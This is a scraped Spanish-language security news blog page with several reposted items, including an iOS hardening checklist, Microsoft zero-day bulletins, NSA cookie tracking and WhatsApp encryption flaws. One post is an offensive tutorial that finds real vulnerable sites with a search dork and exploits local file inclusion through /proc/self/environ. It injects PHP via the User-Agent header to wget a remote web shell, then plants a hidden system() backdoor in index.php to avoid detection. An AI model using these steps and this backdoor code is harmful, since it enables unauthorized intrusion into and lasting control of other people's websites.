src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRw6_Bv0UClVxTapaBHlTB_5KeonTmbcge3BwkbByBC1nmsMIyxURr94QxBY6NqxMQOdr094GKzkLIGEFiBk8kdL-klvnyPoe6zJ4ke_A-iZGAFnQ99nwGLKZm4F1WMQ2l4tUo6rKAaP1P/s320/Hacked_twitter_doble_autenticacion.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Gracias a ésto, los activistas por los derechos civiles pudieron acceder al contenido censurado sin mayores problemas (aunque solo de forma presencial pues no es permitido extraer ninguna copia desde la Biblioteca del Congreso), donde por ejemplo se encontraron con que el manual aconsejaba a los agentes del FBI a tomar fotografías de cuerpo entero a los detenidos acompañados de una botella de agua, para así usarlas en contra de posibles acusaciones de abusos en un juicio.<br /> <br /> Además de todo esto, lo más estúpido <a href="http://www.techdirt.com/articles/20131220/10200525651/fbi-agent-tries-to-register-copyright-top-secret-interrogation-manual-making-it-available-to-anyone.shtml" rel="nofollow" target="_blank">según Techdirt</a> es que cualquier obra creada por un empleado del gobierno federal es automáticamente de dominio público, por lo que en teoría no deberían siquiera poder obtener su copyright.<br /> <br /> Fuente: <a href="http://www.fayerwayer.com/2013/12/revelan-manual-secreto-para-interrogaciones-del-fbi-al-querer-registrar-su-copyright/">Fayerwayer</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Quién sabe por qué el autor del manual quiso registrar una obra que supuestamente era ultra secreta. El reconocido medio liberal estadoun...

Leer más »

Acciones para fortificar iPhone y iPad

<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBk1R7pfqG3sYcXOD4wTWcU8wKW-rq-QOGQh-FxV1Kc1GGm1I5JH2OaKAATF5NxzPh3tK7nSA88srhvAMe6hkJ9n4hRA9mE83zh0S7UIk3JrQaJ1FIPyGPPStxpM9bb9oS9jzkBCM9ibMI/s1600/Motorola+2.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="166" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBk1R7pfqG3sYcXOD4wTWcU8wKW-rq-QOGQh-FxV1Kc1GGm1I5JH2OaKAATF5NxzPh3tK7nSA88srhvAMe6hkJ9n4hRA9mE83zh0S7UIk3JrQaJ1FIPyGPPStxpM9bb9oS9jzkBCM9ibMI/s320/Motorola+2.jpg" width="320" /></a></div> En la <a href="https://wikis.utexas.edu/display/ISO/Apple+iOS+Hardening+Checklist" rel="nofollow" target="_blank">Universidad de Texas han publicado una <i>check-list</i></a> de las cosas que deberías hacer para fortificar la seguridad de un terminal iOS. Si estás en un entorno empresarial en el que hay un MDM o haces uso de <a href="http://www.seguridadapple.com/2012/06/iphone-configuration-utility-politicas.html" rel="nofollow" target="_blank">iPhone Configuration Utility</a> para desplegar políticas de seguridad en los terminales de tu empresa, merece la pena que las repases: <br /> <br /> <h3> <b>Acciones de Seguridad Básica</b></h3> 01.- Actualizar el sistema operativo a la última versión<br /> 02.- No hacer <i>Jailbreakin</i>g <br /> 03.- Configurar las actualizaciones de seguridad automáticas para las aplicaciones<br /> 04.- Configurar la funcionalidad de borrado remoto (<i>wiping</i>)<br /> 05.- Activar el servicio Find My iPhone<br /> 06.- Cifrar los <i>backups</i> de Apple iTunes<br /> 07.- Eliminar todos los datos antes de devolverlo, llevarlo a reparar o reciclarlo<br /> <h3> <b>Acciones de Seguridad en Autenticación</b></h3> 08.- Activar el <i>passcode</i><br /> 09.- Usar <i>passcodes</i> complejos<br /> 10.- Activar el autobloqueo temporal<br /> 11.- Deshabilitar el periodo de gracia para el bloqueo (tiempo sin pedir <i>passcode</i>)<br /> 12.- Configurar borrado de datos tras varios fallos en el <i>passcode</i><br /> 13.- Activar Data Protection<br /> <h3> <b>Acciones de seguridad en Navegación</b></h3> 14.- Activar el servicio anti-phishing/anti-fraude en Safari<br /> 15.- Deshabilitar las opcines de auto rellenado<br /> 16.- Bloquear el uso de <i>cookies</i> de terceros<br /> 17.- Activar el servicio <i>Do-Not-Track</i><br /> <h3> <b>Acciones de Seguridad de Red</b></h3> 18.- Deshabilitar preguntar para conectarse a redes WiFi<br /> 19.- Deshabilitar WiFi cuando no esté en uso<br /> 20.- Deshabilitar BlueTooth cuando no esté en uso<br /> 21.- Deshabilitar compartir Internet cuando se esté utilizando<br /> 22.- Olvidar las redes WiFi después de usarlas<br /> <h3> <b>Acciones Adicionales de Seguridad</b></h3> 23.- Desactivar los servicios de Geo-localización<br /> 24.- Restringir el acceso a los servicios de localización, fotos y contactos<br /> 25.- Deshabilitar el centro de control con la pantalla bloqueada<br /> 26.- Deshabilitar Apple Touch ID<br /> 27.- Activar la navegación privada en Apple Safari<br /> 28.- Desactivar <i>JavaScript</i> en Mobile Safari<br /> <br /> La verdad es que como primera aproximación no está mal, pero nosotros añadiríamos alguna opción más así que os dejamos una segunda parte de opciones de seguridad adicional para que os puedan completar esta lista, y que hacen referencia a técnicas de ataque descritas en el <a href="http://0xword.com/libros/39-libro-hacking-dispositivos-ios-iphone-ipad.html" rel="nofollow" target="_blank">libro de Hacking iOS</a>.<br /> <h3> <b>Acciones de Seguridad 2</b></h3> 29.- Desactivar la previsualización de mensajes en pantalla bloqueada<br /> 30.- Desactivar Siri con pantalla de bloqueo<br /> 31.- Configurar cuentas de servicio en <i>apps</i> y no contraseñas de cuenta<br /> 32.- No conectar el terminal a equipos o cargadores que no sean de confianza<br /> 33.- No activar pre-visualización automática de imágenes en correos electrónicos<br /> <br /> Como siempre, al final el último responsable de la seguridad de tu terminal eres tú, así que ten mucho cuidado con lo que haces, y dónde lo haces.<br /> <br /> Fuente: <a href="http://www.seguridadapple.com/2013/12/lista-de-acciones-para-fortificar-un.html" rel="nofollow" target="_blank">Seguridad Apple</a><div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

En la Universidad de Texas han publicado una check-list de las cosas que deberías hacer para fortificar la seguridad de un terminal iOS...

Leer más »

Robocoin, primer ATM de #Bitcoin

<div style="text-align: justify;"> La máquina, fabricada por la empresa norteamericana <a href="https://robocoinkiosk.com/" rel="nofollow" target="_blank">Robocoin</a> (<a href="https://www.youtube.com/watch?v=uoiAewo5K7s" rel="nofollow" target="_blank">ver video</a>), se asemeja un cajero automático común y corriente.</div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8I4Y7j1Y_l2_H8UjVDkW7mA58Y2cB_lwshB9WMP-ujNPrjq7BKhF01qr4AI52gJq-dQdPsQCwdAG6mkkElnCumIHBniInHMoX0XodGFu3jf16ji6t146ZP5K3HA46SQYtorAen76nkRLX/s1600/rcBlue.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj8I4Y7j1Y_l2_H8UjVDkW7mA58Y2cB_lwshB9WMP-ujNPrjq7BKhF01qr4AI52gJq-dQdPsQCwdAG6mkkElnCumIHBniInHMoX0XodGFu3jf16ji6t146ZP5K3HA46SQYtorAen76nkRLX/s1600/rcBlue.png" /></a></div> <div style="text-align: justify;"> <br /> <br /> No obstante, en vez de poderse realizar en él transacciones tradicionales, sirve para cambiar dólares canadienses por bitcoins, la moneda virtual de internet inventada en 2008 por un experto en computación anónimo, conocido sólo por su seudónimo Satoshi Nakamoto.<br /> <br /> Usuarios se alinearon frente al cajero automático para inaugurarlo, antes de recurrir a sus teléfonos inteligentes para comprar café y dulces en el café Waves.<br /> <br /> Este cajero automático de bitcoins es el primero en su estilo en el mundo, según uno de sus dueños, Mitchel Demeter, un emprendedor local que comenzó a intercambiar bitcoins hace varios años, y este año abrió con dos socios <b>Bitcoiniacs</b>, una casa de cambios para esta moneda en Vancouver.<br /> <br /> Él y sus amigos, que estudiaron juntos, dicen que vieron en la posibilidad de desarrollar estos cajeros automáticos una oportunidad de negocios. <i> "Nadie tenía acceso a un cajero automático, todo el mundo compraba y vendía en páginas online"</i>, señala Demeter.<br /> <br /> Los usuarios tienen un código, similar a la clave bancaria regular, para acceder a su cuenta en internet de bitcoins en el cajero automático.<br /> <br /> Pueden retirar el equivalente a la moneda local sobre la base de un tipo de cambio que actualmente se ubica en 1 bitcoin por 200 dólares, o depositar dinero en efectivo.<br /> <br /> La transferencia de dinero se realiza a través de VirtEx, el sistema de transacciones monetarias en internet.<br /> <br /> Las personas pueden luego usar sus bitcoins con un teléfono inteligente, de una manera similar a la que utilizarían una tarjeta de crédito, o para comprar en línea.<br /> <br /> <i>"Es la moneda de internet, tan real como cualquier otra"</i>, dice Demeter.<br /> <br /> La volátil moneda no ha sido regulada aún por ningún gobierno en el mundo, y ha cobrado cierta notoriedad por haber sido usada en el tráfico de drogas.<br /> <br /> Alemania se convirtió en el primer país del mundo este año en declarar los bitcoins una "moneda privada", un estatus que permite gravar las transacciones que se realicen con ellas.<br /> <br /> En Vancouver los bitcoins son aceptados por una quincena de negocios, desde cafés hasta empresas de paisajismo.<br /> <br /> Esta moneda es cada vez más común en ciudades como Berlín y San Francisco, e incluso en Argentina, y son aceptadas por compañías de internet como Wordpress.<br /> <br /> David Lowy, un empresario que usó su teléfono inteligente para transferir .0101 bitcoins al camarero del café Waves para pagar una taza de café, equivalente a 2 dólares canadienses, dijo que Vancouver era una buena candidata para el primer cajero automático de la moneda, porque la ciudad es popular entre los empresarios de internet.<br /> <br /> Uno de los primeros usuarios del cajero fue Mike Yeung, un estudiante de negocios en la universidad Simon Fraser, donde ayudó a crear el club universitario de bitcoin, uno de los varios grupos de ese estilo en el mundo.<br /> <br /> El objetivo del club es <i>"educar a la gente acerca de bitcoin para que lo puedan introducir en su vida diaria"</i>, dice. <i>"Creo que los bitcoins son el futuro, porque garantizan máximo valor y eficiencia"</i>, explica Yeung.<br /> <br /> Una vez que los bitcoins tengan un uso más fluido, predice Yeung, podrán usarse para transferir dinero de forma económica alrededor del mundo, de la misma manera que internet permite a las personas comunicarse de un lugar a otro con aplicaciones como Skype.<br /> <br /> Señala la nueva máquina en la pared del café: <i>"Este cajero automático es un paso adelante"</i>, dice.<br /> <br /> Fuente: <a href="http://www.infobae.com/2013/10/30/1520172-canada-tiene-el-primer-cajero-automatico-bitcoins" rel="nofollow" target="_blank">Infobae</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

La máquina, fabricada por la empresa norteamericana Robocoin ( ver video ), se asemeja un cajero automático común y corriente. No o...

Leer más »

Vulnerabilidades 0 day que se están explotando In-the-Wild

<div style="text-align: justify;"> Este mes se <a href="http://blog.segu-info.com.ar/2013/12/microsoft-cierra-el-ano-con-11.html" rel="nofollow" target="_blank">publicaron ocho boletines de seguridad de Microsoft</a>, de MS13-096 a MS13-106. Cinco de ellos están clasificados como "Críticos" y otros seis como "Importantes". Las prioridades de este mes son las vulnerabilidades críticas de GDI+ (MS13-096), Internet Explorer (MS13-097) y Scripting Runtime (MS13-096).<br /> <br /> Muchas vulnerabilidades se han estado explotando en ataques dirigidos en todo el mundo, y una de ellas lo ha estado haciendo por al menos seis meses.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH6B1iYmRBqMXcPAb4byyXtxRtLxuh7gkuUlx5dFFmYAdPwErzScwuKNnaYS-61p1t4aOZgIWFT1IdU07AU7vv7S9zdAD-T7O78U_10lYK-A8fMJFqBgHIvDkw28QdeTQj6M-f9UAa0BYE/s1600/Hacked_sirios.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="180" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiH6B1iYmRBqMXcPAb4byyXtxRtLxuh7gkuUlx5dFFmYAdPwErzScwuKNnaYS-61p1t4aOZgIWFT1IdU07AU7vv7S9zdAD-T7O78U_10lYK-A8fMJFqBgHIvDkw28QdeTQj6M-f9UAa0BYE/s320/Hacked_sirios.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> La actualización de GDI+ parcha una vulnerabilidad de corrupción de memoria, <a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-3906" rel="nofollow" target="_blank">CVE-2013-3906</a>, que detectamos como <a href="http://www.viruslist.com/sp/weblog?weblogid=208188884" rel="nofollow" target="_blank">Exploit.Win32.CVE-2013-3906.a</a>. Hemos visto unas cuantas variantes de ITW explotándose como un archivo TIFF deforme, que distribuye puertas traseras como Citadel, el bot BlackEnergy, PlugX, Taidoor, Janicab, Solar y Hannover. El perfil de sus blancos de ataque y la distribución de sus paquetes de herramientas indican que varios cibercriminales tienen control de este exploit desde julio y que la amenaza cuenta con una extensa cadena de distribución que lo repartió por todo el mundo. Tomando en consideración su variedad de usos y fuentes, esta vulnerabilidad podría reemplazar a cve-2012-0158 en cuestión de volumen general de ataques dirigidos.<br /> <br /> El boletín de Internet Explorer enmienda siete diferentes vulnerabilidades de elevación de privilegio y corrupción de memoria, que afectan de Internet Explorer 6 en Windows XP SP 3 a Internet Explorer 11 en Windows Server 2012 R2 y Windows RT 8.1. Creemos que pronto se verán exploits para algunas de estas vulnerabilidades a la venta en paquetes de exploits.<br /> <br /> Por último, existe otra vulnerabilidad crítica en Windows Scripting Engine y una vulnerabilidad "use after free" más, que por desgracia permite la ejecución remota de código a través de cada versión de Windows existente y puede atacarse mediante cualquiera de los navegadores más comunes. ¡Instalen los parches!<br /> <br /> Fuente: <a href="http://www.viruslist.com/sp/weblog?weblogid=208188900">Viruslist</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Este mes se publicaron ocho boletines de seguridad de Microsoft , de MS13-096 a MS13-106. Cinco de ellos están clasificados como "C...

Leer más »

NSA utiliza las cookies para espiar

<div style="text-align: justify;"> La <a class="a" href="http://www.abc.es/internacional/20130612/abci--201306120259.html" rel="nofollow" target="_blank" title="Agencia de Seguridad Nacional">Agencia de Seguridad Nacional </a>(NSA, por sus siglas en inglés) de Estados Unidos recurre <a class="a" href="http://www.abc.es/internacional/20131030/abci-infiltro-centros-datos-google-201310301818.html" rel="nofollow" target="_blank" title="a las «cookies» de Google">a las «cookies» de Google</a> para consultar la actividad previa del usuario y conocer sus gustos —como hacen los anunciantes de Internet—, con el fin último de identificar los objetivos a espiar. <br /> <br /> Según una investigación del diario estadounidense «The Washington Post», unas diapositivas de la NSA proporcionadas por <a class="a" href="http://www.abc.es/internacional/20131108/abci-snowden-contrasenas-espionaje-201311081112.html" rel="nofollow" target="_blank" title="el excontratista de la NSA Edward Snowden">el excontratista de la NSA Edward Snowden</a> confirmarían que la agencia está utilizando estas <b>técnicas de rastreo para identificar objetivos a "hackear" y reforzar la vigilancia.</b> <br /> <br /> Durante años, los defensores de la privacidad en Internet han expresado su preocupación por el uso de las herramientas de seguimiento comerciales que se usan para identificar y dirigirse a los consumidores con determinados anuncios. La industria, por su parte, responde que supone un beneficio para los consumidores al proporcionarles anuncios de su interés . <br /> <br /> Según los citados documentos, la NSA y el GCHQ (la agencia de inteligencia del Reino Unido) han encontrado "un uso particular" para un mecanismo de seguimiento específico de Google, conocido como la "cookie" <i>PREF</i>, que no suele contener información personal, como el nombre de una persona o su dirección de correo electrónico, pero que incluye códigos numéricos que permiten identificar el navegador de un usuario. </div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kBq9Epffy71yN96CyirjqbChPCpw9uUPT0mBV6GfvwE00IDVQ5q8q85ZE_Xl1uJFm7lbMJ9J8XSsD1AG8O3ibknLe3XlPNcHBFX0F0aZjiiFQZ2BS_cV0n0JvCPWjJokPnTWA4QFcain/s1600/Espia.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="201" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi6kBq9Epffy71yN96CyirjqbChPCpw9uUPT0mBV6GfvwE00IDVQ5q8q85ZE_Xl1uJFm7lbMJ9J8XSsD1AG8O3ibknLe3XlPNcHBFX0F0aZjiiFQZ2BS_cV0n0JvCPWjJokPnTWA4QFcain/s320/Espia.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Además del seguimiento, esta «cookie» permitiría aislar las comunicaciones de una persona entre el mar de datos de Internet con el objetivo de enviar un software capaz de "hackear" la computadora de esa persona. Unos ataques específicos que, sin embargo, no estarían detallados en los documentos filtrados. <br /> <br /> Según ha resaltado el diario, la NSA utilizaría esta técnica para seguir a personas bajo sospecha o, incluso, para localizarles a través de la conexión a Internet de su terminal móvil, rastreando la ubicación de cada dispositivo. Los expertos consultados por este medio afirman que en las diapositivas <a class="a" href="http://www.abc.es/internacional/20130823/abci-recopila-miles-documentos-201308231746.html" rel="nofollow" target="_blank" title="no se especifica si existe un cooperación por parte de Google"> no se especifica si existe un cooperación por parte de Google</a>, aunque advierten de que si la NSA obtiene los datos de esa manera y las empresas conocen sus movimientos, están legalmente obligadas a denunciarlo. <br /> <br /> Fuente: <a href="http://www.hackplayers.com/2013/12/nsa-utiliza-las-cookies-para-espiar.html" rel="nofollow" target="_blank">Hackplayers</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

La Agencia de Seguridad Nacional (NSA, por sus siglas en inglés) de Estados Unidos recurre a las «cookies» de Google para consultar la ac...

Leer más »

Cualquiera puede leer tus conversaciones de WhatsApp

<div style="text-align: justify;"> Cualquier persona puede leer tus conversaciones de WhatsApp. Lo revela un análisis exhaustivo de protocolo, sistema de seguridad y métodos usados por la compañía para enviar y recibir mensajes.<br /> <br /> Tus conversaciones de WhatsApp pueden ser leídas. Así de simple pero así de contundente. Da igual si el contenido ahora está cifrado. No es una cuestión de posibilidades, ni una teoría, es una realidad y se puede hacer con las últimas versiones de la aplicación. No es la primera vez que sucede y estoy convencido de que no será la única. WhatsApp es una compañía irresponsable que simplemente se niega a mejorar sus sistemas de seguridad aun cuando son tan populares que se los considera responsables directos de la desaparición del SMS.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3oP4J7eQvEcg1naj9Ry0Hn0OirJgKEPEiTq5GtR3HWCz9g4Z21VuzV8rleglktBG_Emtk3qS7MP2lYukI5L3_qX4hPeLlNRAURczosa8afvcvZiUNrs9OL9vF73h3a0Igvzu3_HbpmKr8/s1600/Whatsapp_Virus.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="145" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi3oP4J7eQvEcg1naj9Ry0Hn0OirJgKEPEiTq5GtR3HWCz9g4Z21VuzV8rleglktBG_Emtk3qS7MP2lYukI5L3_qX4hPeLlNRAURczosa8afvcvZiUNrs9OL9vF73h3a0Igvzu3_HbpmKr8/s320/Whatsapp_Virus.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Thijs Alkemade, un estudiante de ingeniería de sistemas y matemáticas en la Universidad de Utrecht <a href="https://blog.thijsalkema.de/blog/2013/10/08/piercing-through-whatsapp-s-encryption/" rel="nofollow" target="_blank">ha analizado a detalle el sistema de cifrado que usa WhatsApp</a>, los aspectos técnicos del funcionamiento de la aplicación y cómo dos errores en la implementación hacen que una persona con suficiente conocimiento técnico y acceso a la misma red a la que estás conectado (por ejemplo, a la misma red Wi-Fi) sea capaz de interceptar mensajes que envías y recibes, romper el cifrado y leerlos. WhatsApp Sniffer fue la app más popular en su momento.<br /> <br /> En términos simples y sencillos: debes asumir que si una persona tiene el suficiente interés de leer tus mensajes de WhatsApp, puede hacerlo. Ya sea por conocimiento propio o por medio de un tercero que lo tenga. El pensamiento inmediato suele ser «¿Quién estaría interesado en leer mis mensajes?» pero recordemos que, por vulnerabilidades como esta, han aparecido aplicaciones que hacen el trabajo sucio por ti y se empiezan a espiar todos los textos intercambiados en una misma red Wi-Fi de forma automática. Pero si además usas WhatsApp para trabajo, te estás disparando en el pie. Pero si lo usas para intercambiar información privilegiada o sensible, deberías ser despedido inmediatamente por irresponsable extremo.<br /> </div> <h3 style="text-align: justify;"> ¿Por qué WhatsApp es tan inseguro?</h3> <div style="text-align: justify;"> Es la pregunta que muchos nos hacemos constantemente considerando el alcance y la inmensa popularidad que tiene el servicio. Ahora mismo la compañía detrás de la aplicación tiene, básicamente, el mismo poder que una operadora telefónica pero sin estar bajo las mismas regulaciones. Por lo cual, aparentemente, dan poca prioridad o tienen poco interés en cumplir con una responsabilidad de mantener seguro el intercambio de información entre sus usuarios. WhatsApp ya no es gratis. Sí, de acuerdo, es un servicio de dos dólares al año, pero al pedir dinero —por muy bajo que sea— estás cobrando por tu servicio, lo mínimo que se debería ofrecer es seguridad decente. Especialmente considerando que hay otros servicios similares que ofrecen una mejor seguridad. Hoy WhatsApp es el rey, pero hace 4 años BlackBerry Messenger lo era, en estas épocas cambiar de <i>app</i> para mensajear es muy muy simple.<br /><br /> Seguramente WhatsApp hará correcciones a las aplicaciones y al protocolo de comunicación para mejorar su seguridad, la pregunta que siempre quedará ahí: ¿Es suficiente? Lo peor del caso es que del lado del usuario no hay solución inmediata. No puedes hacer nada para que tus conversaciones de WhatsApp sean más seguras. ¿Mi consejo? <b>Deja de usarlo</b>, hoy mismo.<br /><br /> Fuente: <a href="http://alt1040.com/2013/10/leer-conversaciones-whatsapp" rel="nofollow" target="_blank">Alt1040</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

Cualquier persona puede leer tus conversaciones de WhatsApp. Lo revela un análisis exhaustivo de protocolo, sistema de seguridad y métodos...

Leer más »

Explotar LFI, Subir Shell Explotando /proc/self/environ y Backdorizar

<div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPjYRZ61rGvGwOF7MAtpJ3c0R9vA6tqV-ET8FbWe3Cqpv7mWJymo61r_66HsREkLNDCUopUNKSGOffxBueRqPLfA4MlRl-cLT8rXqvKMyMMoENYz_HtDh6ynJ8Co8cxT9J8KPWs__eLYYF/s1600/bender_applause.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhPjYRZ61rGvGwOF7MAtpJ3c0R9vA6tqV-ET8FbWe3Cqpv7mWJymo61r_66HsREkLNDCUopUNKSGOffxBueRqPLfA4MlRl-cLT8rXqvKMyMMoENYz_HtDh6ynJ8Co8cxT9J8KPWs__eLYYF/s1600/bender_applause.png" /></a></div> Intrusion LFI php://input<br />tutorial de otro metodo para conseguir subir una shell por medio de LFI<br />utilizando inyecciones de codigo en php atraves de una vulnerabilidad en el /proc/self/environ<br /><br />Empecemos:<br /><br />Primero Buscamos con un dork alguna web Vulnerable a LFI<br /><br />Dork:<br /><br />inurl:*.php?page=* site:.com.co<br /><br />Vamos probando hasta encontrar una q al incluir /etc/passwd nos muestra su contenido<br />En este caso:<br /><br />http://sitiovulnerable/index.php?page=/etc/passwd<br /><br />Damos como parametro a incluir /proc/self/environ y vemos el siguien resultado<br /><br />http://sitiovulnerable/index.php?page=/proc/self/environ<br /><br /><br />Nos vamos a Mozilla Firefox y abrimos el addon Tamper Data:<br /><br />Damos clik en Start Tamper y volvemos a realizar la Peticion al sitio web<br /><br /><br />Desactivamos la casilla "Continue Tampering" y Damos Click en Tamper, modificamos el Parametro User-Agent intrudiciendo algun Codigo php, de Prueba, Yo intentare con <? System('ls'); ?> para ver si logramos listar el contenido de host.<br /><br /><br /><br />Damos Click en OK y vemos q el codigo php se ejecuta correctamente y lista los archivos y directorios de la web Vulnerable:<br /><br /><br /><br />Ahora Sabemos que se puede ejecutar Codigo Shell atraves de php con el comando system,exec,etc (si no funcionace reciviriamos un mensaje diciendo q la funcion system() a sido deshabilitada por razones de seguridad)<br /><br />Subiremos Nuestra Shell, de la siguiente forma.<br /><br />Abriremos Tamper Data y comensaremos a Capturar.<br />Repetiremos la Peticion al host:<br />http://sitiovulnerable/index.php?page=/proc/self/environ<br />Modificaremos el Parametro User-Agent para que ejecute Wget y descarge una shell en txt de donde sea que este alojada con el siguiente codigo php<br /><br /><? system('wget http://SitioDeLaShell/shell.txt'); ?><br /><br /><br /><br />Repetimos la Operacion Con Tamper Data y Comprobamos q nuestra shell se subio correctamente pasando como parametro en User-Agent<br /><br /><? system('ls'); ?><br /><br />Vemos que dentro de la lista de archivos del host aparece nuestra shell<br /><br /><br /><br />Convertiremos Nuestro txt, en un archivo php, repitiendo la operacion con Tamper Data y pasando como Parametro de User-Agent<br /><br /><? system('mv c99.txt s.php'); ?><br /><br />Una ves Hecho Esto repetimos el procedimiento con tamper data para listar nuestros archivos, para ver si el proceso anterior Termino Correctamente:<br /><br /><? system('ls'); ?><br /><br /><br /><br />Como vemos el archivo fue Renombrado Correctamente, solo nos queda vistar nuestro archivo por medio de la URL<br /><br />http://sitiovulerable/s.php<br /><br /><br /><br />Como vemos la ejecucion de la shellphp, se ejecuto Correctamente. Como es un Sitio Importante y no queremos q nos detecten, introduciremos un backdoor dentro del codigo de algun archivo, yo elegi index.php<br /><br /><br /><br />Les Dejo el code del backdoor que arme:<br /><br /><?php<br />if($_GET['active']=='si'){<br />system( $_GET['c']);<br />}<br />?><br /><br />Lo Introduciremos dentro de index.php y al llamarlo desde<br /><br />http://SitioVulnerable/index.php?c=ls&active=si<br /><br />nos mostrara el resultado de la ejecucion del parametro q pasemos.<br /><br /><br /><br />Solo nos queda Eliminar s.php con el comando rm s.php por medio de nuestro backdoor<br /><br />http://SitioVulnerable/index.php?c=rm s.php&active=si<br /><br />Listamos el Contenido del Host<br /><br />http://SitioVulnerable/index.php?c=ls&active=si

Intrusion LFI php://input tutorial de otro metodo para conseguir subir una shell por medio de LFI utilizando inyecciones de codigo en php ...

Leer más »

Twitter también implementará Perfect Forward Secrecy (PFS)

<div style="text-align: justify;"> El protocolo es recomendado por la Electronic Frontier Foundation y en Twitter ya adelantaron que ralentizará un poco el servicio.<br /> <br /> En vista de las recientes revelaciones del espionaje de las agencias de seguridad norteamericanas sobre prácticamente casi toda la industria tecnológica, <a href="https://blog.twitter.com/2013/forward-secrecy-at-twitter-0" rel="nofollow" target="_blank">Twitter anunció que</a> su servicio cambiará sus estándares de cifrado utilizando un nuevo protocolo de seguridad.</div> <div style="text-align: justify;"> <br /></div> <div class="separator" style="clear: both; text-align: center;"> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_RkWUjwnnZjqda2ToQxuafXn9D6EswrdDBj3Dse9ySV8xCGcLAJLGS9njJrkbanqEoiMhLwj5nGekS0CILoJhRYpW0Am-umgENBiJbkXI-zssXfV9K9JAdobxKolW0LSVd2mqgsSbnifX/s1600/Efecto_Twitter.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="240" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj_RkWUjwnnZjqda2ToQxuafXn9D6EswrdDBj3Dse9ySV8xCGcLAJLGS9njJrkbanqEoiMhLwj5nGekS0CILoJhRYpW0Am-umgENBiJbkXI-zssXfV9K9JAdobxKolW0LSVd2mqgsSbnifX/s320/Efecto_Twitter.jpg" width="320" /></a></div> <div style="text-align: justify;"> <br /> <br /> Este protocolo, <a href="https://www.eff.org/deeplinks/2013/08/pushing-perfect-forward-secrecy-important-web-privacy-protection" rel="nofollow" target="_blank">recomendado por muchos expertos en el área como la EFF</a> (Electronic Frontier Foundation), es conocido como <a href="http://es.wikipedia.org/wiki/Perfect_forward_secrecy" rel="nofollow" target="_blank">Perfect Forward Secrecy</a>.<br /> <br /> La EFF explica el funcionamiento de la siguiente forma: Con el cifrado estándar HTTPS la llave (o clave) para desencriptar la información está almacenada en el servidor, lo que significa que una agencia de seguridad como la NSA puede capturar toda la información y simplemente esperar hasta que llegue el día que obtenga la llave para descifrar toda esta información.<br /> <br /> Sin embargo, el protocolo Perfect Forward Secrecy (que se implementaría encima de HTPPS) consistiría en el fondo en <b>generar una llave nueva para cada interacción,</b> esperando así prevenir la captura pasiva de datos de la NSA.<br /> <br /> El nuevo protocolo requerirá una arquitectura de servidores un poco más compleja, lo que dará como resultado un servicio quizá un poco más lento, pero Twitter cree que esta seguridad extra valdrá completamente la pena. Al fin y al cabo, aseguraron que debería ser un estándar y <a href="http://www.theverge.com/2013/6/26/4468050/facebook-follows-google-with-tough-encryption-standard" rel="nofollow" target="_blank">ya fue implementado</a> por <a href="http://blogs.computerworld.com/encryption/22366/can-nsa-see-through-encrypted-web-pages-maybe-so" rel="nofollow" target="_blank">Google</a> y <a href="http://news.cnet.com/8301-13578_3-57591179-38/data-meet-spies-the-unfinished-state-of-web-crypto/" rel="nofollow" target="_blank">Facebook</a>.<br /> <br /> Fuente: <a href="http://www.fayerwayer.com/2013/11/twitter-implementara-perfect-forward-secrecy-para-aumentar-la-seguridad/">FayerWayer</a></div> <div style="background-color: white; border: medium none; color: black; overflow: hidden; text-align: left; text-decoration: none;"> <br /></div>

El protocolo es recomendado por la Electronic Frontier Foundation y en Twitter ya adelantaron que ralentizará un poco el servicio. En ...

Leer más »

Facebook permite ver la lista de amigos privada

